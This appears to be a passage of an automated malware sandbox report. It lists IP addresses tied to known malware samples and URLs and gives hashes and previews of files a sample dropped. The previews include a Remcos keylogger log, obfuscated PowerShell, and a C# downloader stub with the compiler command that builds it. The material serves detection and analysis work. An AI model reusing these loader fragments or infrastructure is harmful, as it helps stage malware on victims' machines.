                                                                          f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                          • 192.169.69.26
                                                                          P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                          • 192.169.69.26
                                                                          173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 192.169.69.26
                                                                          173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 192.169.69.26
                                                                          AS-COLOCROSSINGUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 172.245.123.12
                                                                          ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                          • 192.3.220.6
                                                                          newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 107.173.4.16
                                                                          crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 107.173.4.16
                                                                          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.179.166
                                                                          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.179.166
                                                                          Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 172.245.123.12
                                                                          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.179.166
                                                                          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.179.166
                                                                          Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 172.245.123.12
                                                                          FASTLYUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 151.101.1.137
                                                                          ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                          • 199.232.196.209
                                                                          https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                          • 151.101.131.6
                                                                          https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                          • 151.101.130.137
                                                                          https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                                          • 151.101.2.109
                                                                          https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2FN4SKHyAe889o909j2BgEQTYHmZASxysFG5X1abiH-2Bc9UXRQ1Ein-2BS-2BlY0g6W3s6a-2Bg8fspAfccvSCNZ8UZez1w-3D-3DUR2i_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTU66UCHiyx70Gk8JDD2YjXZuzQvmiRgDA-2FXjbWgjk3i1v2Ulq6y1yKgmK1yrN5XfmHVDLnIEf-2BjigPUThjsOSZZpY0Q2K61IDWrFAR0MbUNzwiY-2FVg-2BeuZ5GmE7khj3oFCj0ivt137LdIBat61ZEFDpGet hashmaliciousUnknownBrowse
                                                                          • 151.101.194.137
                                                                          https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiNDGet hashmaliciousUnknownBrowse
                                                                          • 151.101.129.140
                                                                          https://nq.trikeunpured.com/iSH5pdvbnvr/kmgeLGet hashmaliciousUnknownBrowse
                                                                          • 151.101.129.74
                                                                          Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                          • 151.101.120.157
                                                                          FINAL000035745873695487KHFKA.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          • 151.101.194.137
                                                                          CLOUDFLARENETUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 104.21.84.67
                                                                          ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 172.65.156.157
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                          • 104.21.2.110
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                          • 172.67.129.27
                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 188.114.97.3
                                                                          https://tinyurl.com/5faazntxGet hashmaliciousUnknownBrowse
                                                                          • 104.18.111.161
                                                                          https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2dGet hashmaliciousUnknownBrowse
                                                                          • 104.21.16.207
                                                                          gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 104.21.38.84
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                          • 104.21.2.110
                                                                          https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                          • 104.18.94.41
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0ecreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          https://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                          • 172.67.187.200
                                                                          • 151.101.193.137
                                                                          No context
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):316
                                                                          Entropy (8bit):3.4057670265588973
                                                                          Encrypted:false
                                                                          SSDEEP:6:6lZJltjb5YcIeeDAlOWA7DxbN2f1l5m0wiDxbN2f1l5m0v:6lFhDec0WItN2X5y4tN2X5l
                                                                          MD5:C304D797FFC0C82341744387537E8857
                                                                          SHA1:E467364090EF021447803B6C6D2E5B0CA88FB236
                                                                          SHA-256:70C20E9C4C6D65D9983D3CA3406091144A93326657AAB2F4654AFC0D936AEE9B
                                                                          SHA-512:A296A9CF3C7814B6CB4B53208C24D5ED9A30D616EC1F839B367288E9024474C59824E0596E05E5B8A5F5A28636E4CA98DE1375B0C54E2F7B568E3A8E2B6D59A9
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                          Preview:....[.2.0.2.4./.1.2./.1.7. .0.1.:.2.1.:.4.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3339), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):154166
                                                                          Entropy (8bit):3.8156717997547034
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3NscwvBFt3FR3fYwD5PNscwvBFt3FR3fYwDBNscwvBFt3FR3fYwDq:gvB3FR3fYwD5ovB3FR3fYwDivB3FR3fQ
                                                                          MD5:622118455F9B3D92190EDECB9F5A70E4
                                                                          SHA1:EC47A3F75A1A3E197A2745F75015160DA5190D76
                                                                          SHA-256:D9B6D65CD5E6206CCB41A4D12A0A1CF8D55DE31D786CF085D9632E5EAF66914A
                                                                          SHA-512:3AF7582CD5B8E7DDD5C23F5477FA3F595FDB851E0B7FAF51F167C716B0A50CA4CC6AF824B8409CA5745CCC72BC56BBFE201C3B6A7630F04A6E2E84EE248BCF91
                                                                          Malicious:false
                                                                          Preview:...... . . . .....L.l.L.R.U.l.K.G.L.W.i.L.c.c.K. .=. .".K.r.c.L.O.l.G.z.P.L.C.k.Z.f.U.".....c.l.k.q.k.t.W.G.o.p.h.N.K.Q.b. .=. .".H.P.A.a.Z.u.p.f.G.G.K.f.n.q.Q.".....m.i.q.N.Q.Q.p.i.x.B.L.B.K.s.U. .=. .".c.f.e.m.u.x.c.L.K.m.p.A.q.L.c.".........k.e.c.L.N.W.K.U.P.W.z.s.K.i.A. .=. .".T.U.d.k.T.u.L.H.f.z.W.K.K.P.L.".....z.x.K.c.Z.k.U.K.v.R.q.i.G.j.Z. .=. .".f.i.L.p.W.h.h.d.c.K.U.o.c.K.C.".....k.c.i.U.W.K.H.R.q.Q.J.C.P.z.x. .=. .".B.d.U.i.f.R.f.C.P.c.f.o.P.e.G.".....G.c.i.W.B.p.t.q.k.e.z.g.b.b.z. .=. .".u.u.Z.u.R.c.R.B.U.L.k.p.f.K.N.".....T.m.b.N.U.R.W.k.Z.p.I.U.K.Z.L. .=. .".d.z.c.f.m.k.G.f.Q.n.G.n.N.L.u.".....k.J.c.Q.n.c.e.B.o.a.q.H.Z.i.l. .=. .".W.G.a.i.W.z.W.a.t.R.R.L.A.f.h.".....a.t.G.a.o.U.p.U.u.U.f.l.A.i.G. .=. .".U.P.c.n.g.W.m.L.N.G.W.W.Z.S.v.".....k.g.o.B.o.c.q.e.c.r.m.e.k.n.c. .=. .".k.H.G.C.z.H.O.a.q.b.A.c.h.n.b.".....t.K.P.r.L.J.o.N.i.m.H.m.a.h.o. .=. .".i.p.Z.R.O.U.C.c.t.u.k.W.O.z.m.".....e.G.B.k.U.R.e.G.c.Z.s.l.h.W.z. .=. .".n.p.A.a.K.h.G.x.W.c.S.q.L.c.f.".....c.p.e.L.a.L.i.W.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):5829
                                                                          Entropy (8bit):4.901113710259376
                                                                          Encrypted:false
                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1144
                                                                          Entropy (8bit):5.290848674040258
                                                                          Encrypted:false
                                                                          SSDEEP:24:32gSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKM9rgd:GgSU4xympjmZ9tz4RIoUl8NF9C
                                                                          MD5:F262C231D15773CB65C99F7B6AD6A81C
                                                                          SHA1:5DE14E5014654D233C869A4CA47BACF3E1120A1D
                                                                          SHA-256:2A76444C5964969A6D590232EB13C41FA85F6D4DC94E693593A8681ED2C46581
                                                                          SHA-512:23A1D7849A86E9E619D942165F34196D00D7967493BBA5CDE78190F7E2055072F2AB0CD8081739D513FC4197592D621B5DE70FCC6DB80DA5B1BB564430583F9F
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 17 08:11:34 2024, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1328
                                                                          Entropy (8bit):3.972385568015926
                                                                          Encrypted:false
                                                                          SSDEEP:24:HEe9E2+fDcSiXDfHGwKEbsmfII+ycuZhN+YakSRNPNnqSqd:S3izFKPmg1ulda3hqSK
                                                                          MD5:87AC8597EBB620E9EC43FBBF9A6A8474
                                                                          SHA1:14DF8E63E05C53F1AD6F74C8AC43686E9C5938B2
                                                                          SHA-256:197CAC5CB2F3081F22F3AF6A82BD9AF2954C0FC69120B6BA712E7F740E1C8822
                                                                          SHA-512:ED79A16267118AF5F44F28951D687154A580F95A98806ECA67E619C036119CFEF4E06BD862DB7378EB6E86206095048733BA4A25D5C853266ABBBB20F1700873
                                                                          Malicious:false
                                                                          Preview:L...62ag.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP...................SsP]9.V.>}...........4.......C:\Users\user\AppData\Local\Temp\RESBE59.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.u.n.t.a.p.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.092026263675806
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQRqak7YnqqRRbPN5Dlq5J:+RI+ycuZhN+YakSRNPNnqX
                                                                          MD5:96D7ECC9B35373505D39F356E23E7D8B
                                                                          SHA1:4C7CA99D7049D238A95E75A161EBD93A0CFCFC3C
                                                                          SHA-256:D95F267D8359E622985F0CC2E3988328A28623C12DB61F8713CEB9A58BD9993D
                                                                          SHA-512:2CBA0929A2C16B8ED7446AA264AF32016A978468B2D13056059ED40D6A74F2A70393B6D578F215C42DBBD794223EA873FBDE39664B78F292C13C805EB5B0CD03
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.u.n.t.a.p.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.d.u.n.t.a.p.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (376)
                                                                          Category:dropped
                                                                          Size (bytes):498
                                                                          Entropy (8bit):3.8350748498706
                                                                          Encrypted:false
                                                                          SSDEEP:6:V/DsYLDS81zuZxdygPM6JQXReKJ8SRHy4HhLZmculW4J84bWuy:V/DTLDfuZroXfH1L2W424bWuy
                                                                          MD5:DCFC222AE4A88432F5653314F96C284C
                                                                          SHA1:F38C92DFE6C331D9EEDE174861C22B5CB24D1236
                                                                          SHA-256:65B8DF15D3DF5605FF17738E203C4AD07A534BE67BBB493D36A5EF1CBFF2733E
                                                                          SHA-512:75D2ACE08F5908213CF61CCC5C378871D0B5CE47E98221E8C49F4F758216AE0A606799064011011D713C0187C2722700F808FE5138A0CD4320870251C70ECAF7
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace RMRbihMkmt.{. public class zTWPTQWz. {. [DllImport("uRLmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr SUcXIaunbp,string wT,string webmCbRojZy,uint XUtQIKtMwl,IntPtr NhZWrsQq);.. }..}.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):369
                                                                          Entropy (8bit):5.193662367062032
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fjezxs7+AEszIwkn23fjTn:p37Lvkmb6KRf7eWZEif7Tn
                                                                          MD5:BDEA99384A5FE5D4545938C9070B0ABF
                                                                          SHA1:C223B0C90BEC19B37B63743724A7F84E5C63E672
                                                                          SHA-256:2EFB4E035965F0F664AC8042E884662EA1DE9128D26A9CA42762C9B3D1D27F7D
                                                                          SHA-512:9B61BF31383700802D16762572982C1F98780FD1B928C5BC4AFA6913E286C46EEB2338B0028104EB283CCE40566C8D10F0EFA0DE76BF6CF905F3668C176F1CE6
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.0.cs"
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3072
                                                                          Entropy (8bit):2.8614664548819864
                                                                          Encrypted:false
                                                                          SSDEEP:24:etGSzmp2YYnl8eGWkSlunaDiGtkZfhsnCq4lWI+ycuZhN+YakSRNPNnq:6zNY8+eG8un2iJJhsCqF1ulda3hq
                                                                          MD5:F41EECD0CF1AD4C7DE3ACEBE78BF79B8
                                                                          SHA1:4082ECD3B45569A0279638902F2A970C0366173F
                                                                          SHA-256:BD178F46EE80431DA0F30FE5B01523BBEF017B879C6AB9AE0834E9EB7382E431
                                                                          SHA-512:8036BB92999C0B77FDEF320052147799A5180FCD663582F24B2B397D66741BCCADA18E7D76DC2590C7074207A044F0AA098AF3DC8AF80D9E4A897B59693C1E58
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...62ag...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4....................................... .............. B.....P ......T.........Z.....e.....h.....t.........T.....T...!.T.....T.......!.....*.!.....B.......................................+..........<Module>.xd
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):867
                                                                          Entropy (8bit):5.299673329223782
                                                                          Encrypted:false
                                                                          SSDEEP:24:KJBqd3ka6KRfzEifOKax5DqBVKVrdFAMBJTH:Cika6CzEuOK2DcVKdBJj
                                                                          MD5:2B2F6E5067B62681E67C7581CA62CD8C
                                                                          SHA1:38D27E6CB3D37422BE7B62DEA5796B7144E193D5
                                                                          SHA-256:E90F74C4F24BC5B5CB10062E930110E8C36107CCFA5799BA61CD6EAE956C5ED8
                                                                          SHA-512:E827E5E4AC804E1FB74BE415D024393179B3BA905533B10EFE8D52F7B1507DA17625C0D48E616AC30D644544EEFB69D28E8BDF2492A89F8DF4DAE4DC5CA583AC
                                                                          Malicious:false
